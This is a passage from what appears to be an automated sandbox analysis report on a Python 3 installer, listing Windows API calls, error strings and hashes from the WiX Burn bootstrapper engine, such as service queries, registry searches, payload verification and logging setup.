                                                                                                                                  • WaitForInputIdle.USER32(?,?), ref: 0048BF0C
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0048BF57
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0048BF64
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                  • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$c:\agent\_work\138\s\src\burn\engine\approvedexe.cpp
                                                                                                                                  • API String ID: 155678114-1623605306
                                                                                                                                  • Opcode ID: f9ce2b5ae093d28d66c04a5e9b8fa7ef112f1a329e8ca332f6702a8a6c679b30
                                                                                                                                  • Instruction ID: bd7866b98f87b3ab13f3a6fb08a6637d219411f220bbbf0dc5bb4bb73547a841
                                                                                                                                  • Opcode Fuzzy Hash: f9ce2b5ae093d28d66c04a5e9b8fa7ef112f1a329e8ca332f6702a8a6c679b30
                                                                                                                                  • Instruction Fuzzy Hash: AA517D72D0061ABFCF11AFA1CD41EEEBB75EF04304B10496BEA00B2221D7399E549B99
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,004A6D9D,?), ref: 004A6887
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004A6D9D,?,?,?), ref: 004A6894
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,004A6D9D,?,?,?), ref: 004A68DC
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004A6D9D,?,?,?), ref: 004A68E8
                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,004A6D9D,?,?,?), ref: 004A6922
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004A6D9D,?,?,?), ref: 004A692C
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 004A69E3
                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 004A69ED
                                                                                                                                  Strings
                                                                                                                                  • Failed to open WU service., xrefs: 004A6916
                                                                                                                                  • wuauserv, xrefs: 004A68D6
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\msuengine.cpp, xrefs: 004A68B8, 004A690C, 004A6950
                                                                                                                                  • Failed to read configuration for WU service., xrefs: 004A6993
                                                                                                                                  • Failed to mark WU service to start on demand., xrefs: 004A69B4
                                                                                                                                  • Failed to query status of WU service., xrefs: 004A695A
                                                                                                                                  • Failed to open service control manager., xrefs: 004A68C2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$c:\agent\_work\138\s\src\burn\engine\msuengine.cpp$wuauserv
                                                                                                                                  • API String ID: 971853308-2240853446
                                                                                                                                  • Opcode ID: 85abc75c25e06881f8e95c28f1c6a9e2b8640b14144a0220818480e290474e6e
                                                                                                                                  • Instruction ID: 7bdb4ce05d8beae48f23c4b77caf304bd5014f652bd85d5eefb4514b5bc388cd
                                                                                                                                  • Opcode Fuzzy Hash: 85abc75c25e06881f8e95c28f1c6a9e2b8640b14144a0220818480e290474e6e
                                                                                                                                  • Instruction Fuzzy Hash: 3941D5B6E003259BD711AB658C45EAFB7ACAF25B14F1A402BFC05BB340D73CDC0486A8
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0048BBBB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B2D0
                                                                                                                                  • GetLastError.KERNEL32(?,0048BBBB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0048B2DC
                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0048B384
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandleLastModule_memcmp
                                                                                                                                  • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$c:\agent\_work\138\s\src\burn\engine\section.cpp
                                                                                                                                  • API String ID: 3888311042-79629970
                                                                                                                                  • Opcode ID: 7041db14586062e7dcef01cd313044e4e107127536a32681542b6aff7d62dd75
                                                                                                                                  • Instruction ID: 1e2f2b2c6b0cdacba525a1489a4d7dcaec9d9096bca48d492800eb909a2b2bac
                                                                                                                                  • Opcode Fuzzy Hash: 7041db14586062e7dcef01cd313044e4e107127536a32681542b6aff7d62dd75
                                                                                                                                  • Instruction Fuzzy Hash: F941C13A280611EAD32139469C47F2E2255EB81F25B25482FFD015F282EBADC80293ED
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048A362
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,?,00000001,00000000,00000000,?,00000000,?,000002C0,000002C0,?,00000000,00000000), ref: 0048A4B6
                                                                                                                                  Strings
                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0048A451
                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0048A3A3
                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0048A48E
                                                                                                                                  • Failed to format value string., xrefs: 0048A3EE
                                                                                                                                  • Failed to format key string., xrefs: 0048A36D
                                                                                                                                  • Failed to query registry key value., xrefs: 0048A444
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\search.cpp, xrefs: 0048A43A
                                                                                                                                  • Failed to set variable., xrefs: 0048A479
                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 0048A3B7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpen@16
                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$c:\agent\_work\138\s\src\burn\engine\search.cpp
                                                                                                                                  • API String ID: 1561904661-903180124
                                                                                                                                  • Opcode ID: fc70537b16522f4295623f03dd27c2a355d8f15508d18be9f0c9c5ab86f66b38
                                                                                                                                  • Instruction ID: c0111c3e48ab2521d0d38b3cfe14351ef340cf0ab41ad0f83ee8ad670ed0b164
                                                                                                                                  • Opcode Fuzzy Hash: fc70537b16522f4295623f03dd27c2a355d8f15508d18be9f0c9c5ab86f66b38
                                                                                                                                  • Instruction Fuzzy Hash: A1411B36D40114BBEF12BBA5CC06FAF7A64EF04710F10456BFC04B5151E7B99D21979A
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00486A3E
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486A48
                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00486A8B
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486A95
                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00486BBE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$c:\agent\_work\138\s\src\burn\engine\variable.cpp$ntdll
                                                                                                                                  • API String ID: 3057421322-3435586203
                                                                                                                                  • Opcode ID: 68012a3a9ccea06ca93acb1fa3f31a26586539e553c9cc02a98e619c948b9990
                                                                                                                                  • Instruction ID: 69c8751efb844e5b1be260ea46dd7be164f80557f01060ed4edfa6053c8a7ef9
                                                                                                                                  • Opcode Fuzzy Hash: 68012a3a9ccea06ca93acb1fa3f31a26586539e553c9cc02a98e619c948b9990
                                                                                                                                  • Instruction Fuzzy Hash: 2F41D876D402389BCBA5BB658C06BEE76B4EB05715F0105ABE948F6240D7789E80CBDC
                                                                                                                                  APIs
                                                                                                                                  • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,004854DE,?,?,?,?), ref: 004849A2
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004854DE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004849B3
                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00484AF0
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,004854DE,?,?,?,?,?,?,?,?,?,?,?), ref: 00484AF9
                                                                                                                                  Strings
                                                                                                                                  • Failed to set elevated pipe into thread local storage for logging., xrefs: 00484A2A
                                                                                                                                  • Failed to connect to unelevated process., xrefs: 00484998
                                                                                                                                  • comres.dll, xrefs: 00484A5F
                                                                                                                                  • Failed to create the message window., xrefs: 00484A4E
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\engine.cpp, xrefs: 004849D7, 00484A20
                                                                                                                                  • Failed to pump messages from parent process., xrefs: 00484AC4
                                                                                                                                  • Failed to allocate thread local storage for logging., xrefs: 004849E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                  • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$c:\agent\_work\138\s\src\burn\engine\engine.cpp$comres.dll
                                                                                                                                  • API String ID: 687263955-3592602874
                                                                                                                                  • Opcode ID: 06d0643dae1a1c9d01dfb0da42bcc80ccf72f21370e7176b0f5b386723b19ba8
                                                                                                                                  • Instruction ID: 4853aebb41f07a13b41185f509a901e5955da64bd41bf7d5e612b733b765c9b4
                                                                                                                                  • Opcode Fuzzy Hash: 06d0643dae1a1c9d01dfb0da42bcc80ccf72f21370e7176b0f5b386723b19ba8
                                                                                                                                  • Instruction Fuzzy Hash: 2F410377A40626BBC755ABE18C46FDFBA6CFF44714F00062BFA05A6140DB68A90087EC
                                                                                                                                  APIs
                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00493C18
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00493C22
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00493C8B
                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00493C92
                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00493D1C
                                                                                                                                  Strings
                                                                                                                                  • Failed to format session id as a string., xrefs: 00493CC0
                                                                                                                                  • Failed to copy temp folder., xrefs: 00493D45
                                                                                                                                  • Failed to get length of session id string., xrefs: 00493CE7
                                                                                                                                  • Failed to get temp folder., xrefs: 00493C50
                                                                                                                                  • crypt32.dll, xrefs: 00493BD7
                                                                                                                                  • Failed to get length of temp folder., xrefs: 00493C7C
                                                                                                                                  • %u\, xrefs: 00493CAC
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\logging.cpp, xrefs: 00493C46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
                                                                                                                                  • String ID: %u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$c:\agent\_work\138\s\src\burn\engine\logging.cpp$crypt32.dll
                                                                                                                                  • API String ID: 2407829081-1565659654
                                                                                                                                  • Opcode ID: 84683559ccc84348c370a45f23d37e38dea76a0547bb8215ce6fdcd04b9c9ea5
                                                                                                                                  • Instruction ID: 300cacef46506b7a53ffb1f85642bfed53f3aee77c6183565f37a0cc4c83b063
                                                                                                                                  • Opcode Fuzzy Hash: 84683559ccc84348c370a45f23d37e38dea76a0547bb8215ce6fdcd04b9c9ea5
                                                                                                                                  • Instruction Fuzzy Hash: 3741B472D8123D97CB20AF519C49FDA7BA8AB11711F1006E7F808B7240D6789F808BD8
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 004880AE
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004882D6
                                                                                                                                  Strings
                                                                                                                                  • Failed to write variable count., xrefs: 004880C9
                                                                                                                                  • Failed to get numeric., xrefs: 004882A8
                                                                                                                                  • Failed to get version., xrefs: 00488287
                                                                                                                                  • Failed to write variable value type., xrefs: 004882B6
                                                                                                                                  • feclient.dll, xrefs: 00488189, 004881DF, 00488220
                                                                                                                                  • Failed to write variable name., xrefs: 004882BD
                                                                                                                                  • Unsupported variable type., xrefs: 00488293
                                                                                                                                  • Failed to write included flag., xrefs: 004882C4
                                                                                                                                  • Failed to write literal flag., xrefs: 004882AF
                                                                                                                                  • Failed to get string., xrefs: 004882A1
                                                                                                                                  • Failed to write variable value as string., xrefs: 0048829A
                                                                                                                                  • Failed to write variable value as number., xrefs: 00488280
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
                                                                                                                                  • API String ID: 3168844106-2118673349
                                                                                                                                  • Opcode ID: c3d1c483789230a60b5b551ebee18382fe09ff9b891a5c039c7e32c55a55845c
                                                                                                                                  • Instruction ID: b6772835ae7e47610787987969ce9840dc4922d4e520c9c410f4a61dc85efac5
                                                                                                                                  • Opcode Fuzzy Hash: c3d1c483789230a60b5b551ebee18382fe09ff9b891a5c039c7e32c55a55845c
                                                                                                                                  • Instruction Fuzzy Hash: CD71D536C00A19EFCB12AFA4CD41BAE7B65BF04324F5449AFE900A7241CF38DD519B99
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,?,00000000,?,0049A82B,?,00000000,00000000,00000000,?), ref: 004997B4
                                                                                                                                  • GetLastError.KERNEL32(?,0049A82B,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004997C4
                                                                                                                                    • Part of subcall function 004C454C: Sleep.KERNEL32(?,00000000,8NH,004985D8,004CB4D8,004CB4F0,00000001,00000003,000007D0,004CB508,?,crypt32.dll,clbcatq.dll,?,msasn1.dll,comres.dll), ref: 004C4563
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000001,00000003,000007D0,00000000,00000000), ref: 004998D0
                                                                                                                                  Strings
                                                                                                                                  • Failed to copy %ls to %ls, xrefs: 004998BE
                                                                                                                                  • Failed to verify payload hash: %ls, xrefs: 0049985C
                                                                                                                                  • Copying, xrefs: 0049986F, 0049987A
                                                                                                                                  • Failed to verify payload signature: %ls, xrefs: 0049981F
                                                                                                                                  • Failed to open payload in working path: %ls, xrefs: 004997F3
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 004997E8
                                                                                                                                  • Moving, xrefs: 00499866
                                                                                                                                  • %ls payload from working path '%ls' to path '%ls', xrefs: 0049987B
                                                                                                                                  • Failed to move %ls to %ls, xrefs: 004998A8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorFileHandleLastSleep
                                                                                                                                  • String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$c:\agent\_work\138\s\src\burn\engine\cache.cpp
                                                                                                                                  • API String ID: 1275171361-267695647
                                                                                                                                  • Opcode ID: d55d94782b7276a4b294f3d986137e1527ddc001cb04dca0f05e8a10988d3317
                                                                                                                                  • Instruction ID: 3d72d14e44f7d4d7b1fd236043c75e873b6b25680e6396b0dbd5efe5ff085ddd
                                                                                                                                  • Opcode Fuzzy Hash: d55d94782b7276a4b294f3d986137e1527ddc001cb04dca0f05e8a10988d3317
                                                                                                                                  • Instruction Fuzzy Hash: 1631D871A51624BBDF21AA5A9C5AF6B2E1CDF42B64F01013FFD006B381E659DD0086ED
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 004C0758
                                                                                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 004C07B0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$ComputerFileModule
                                                                                                                                  • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$@kN$Computer : %ls$Executable: %ls v%d.%d.%d.%d$HkN$PkN$\kN$dkN$lkN
                                                                                                                                  • API String ID: 2577110986-778261151
                                                                                                                                  • Opcode ID: 2b18de19d35789aa8ff4bd10762250edcada727873e6004ceb514e6e512969d9
                                                                                                                                  • Instruction ID: 0f49e25a1734cca9492b8e3dd3decb0b3a6ac31e90290cb3eb3e5df0eefaaea1
                                                                                                                                  • Opcode Fuzzy Hash: 2b18de19d35789aa8ff4bd10762250edcada727873e6004ceb514e6e512969d9
                                                                                                                                  • Instruction Fuzzy Hash: 374171B59001289BCB54EB658D85FAA73BCFB44304F4141BFE605E7242D634AE848FAC
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 004866A7
                                                                                                                                    • Part of subcall function 004C0F42: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00485F1B,00000000), ref: 004C0F57
                                                                                                                                    • Part of subcall function 004C0F42: GetProcAddress.KERNEL32(00000000), ref: 004C0F5E
                                                                                                                                    • Part of subcall function 004C0F42: GetLastError.KERNEL32(?,?,?,?,00485F1B,00000000), ref: 004C0F79
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004866D3
                                                                                                                                  • GetLastError.KERNEL32 ref: 004866E1
                                                                                                                                  • GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 00486719
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486723
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00486766
                                                                                                                                  • GetLastError.KERNEL32 ref: 00486770
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\variable.cpp, xrefs: 00486705, 00486747
                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 0048670F
                                                                                                                                  • Failed to backslash terminate system folder., xrefs: 004867B3
                                                                                                                                  • Failed to set system folder variant value., xrefs: 004867CF
                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 00486751
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
                                                                                                                                  • String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 325818893-2244462321
                                                                                                                                  • Opcode ID: 51c600a5327ec8a081c817fdcedee0f63f260af31b7ec84f8026887f5fbd3a2a
                                                                                                                                  • Instruction ID: ac1e60945d0f6072bfe4a0055c4ce17acc5b7f90bc5214b7ed999ac95adf2125
                                                                                                                                  • Opcode Fuzzy Hash: 51c600a5327ec8a081c817fdcedee0f63f260af31b7ec84f8026887f5fbd3a2a
                                                                                                                                  • Instruction Fuzzy Hash: 4C311476D4133497D7A0BB518C0AF9F66A8AB00769F02096BED08BA280D77C9D408BDD
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00493B19: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000000,?,?,?,?,00494029,feclient.dll,?,00000000,?,?,?,00484B92), ref: 00493BBA
                                                                                                                                  • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00484B92,?,?,004CB478,?,00000001,00000000,00000000), ref: 004940C0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
